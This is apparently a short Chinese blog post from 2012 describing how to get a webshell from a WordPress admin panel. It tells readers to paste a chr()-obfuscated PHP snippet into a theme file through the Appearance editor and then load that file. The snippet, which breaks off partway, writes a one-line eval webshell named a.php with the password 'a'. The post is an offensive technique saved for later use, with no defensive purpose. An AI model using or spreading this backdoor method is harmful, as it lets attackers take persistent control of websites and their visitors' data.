wordpress后台拿webshell

别的地方看到的留着以后备用进入后台后台-外观-编辑,随便找一个文件插入以下代码fputs(fopen(chr(46).chr(47).chr(97).chr(46). chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97). chr(108).chr(40).c...

别的地方看到的
留着以后备用
进入后台
后台-外观-编辑,随便找一个文件插入以下代码

然后访问下该文件,比如是默认主题我插的404.php那么直接访问

http://xxx.com/wp-content/themes/default/404.php

,这样就在该目录下生成a.php的一句话,密码是a

updated updated 2012-04-14 2012-04-14